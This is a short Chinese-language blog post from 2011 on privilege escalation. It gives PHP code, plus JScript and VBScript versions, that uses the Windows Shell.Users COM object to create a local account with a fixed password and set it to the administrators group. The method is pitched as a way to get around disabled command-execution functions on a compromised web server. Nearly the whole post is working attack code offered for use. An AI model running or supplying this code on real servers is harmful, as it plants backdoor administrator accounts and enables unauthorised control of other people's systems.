PHP 版Shell.Users加管理员

发表于 2011年06月16日
周边

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

PHP 版Shell.Users加管理员帐号

"; $username="abcdef"; $password="abcdef"; $su = new COM("Shell.Users"); $h=$su->create($username); $h->changePassword($password,""); $h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组, ?>

对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

下面是 LCX 的代码
JS:

var o=new ActiveXObject( "Shell.Users" ); 
z=o.create("test") ; 
z.changePassword("123456","") 
z.setting("AccountType")=3;

vbs:

Set o=CreateObject( "Shell.Users" ) 
Set z=o.create("test") 
z.changePassword "123456","" 
z.setting("AccountType")=3

标签：提权原文连接：PHP 版Shell.Users加管理员 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

中越黑客大战 cmd下找终端端口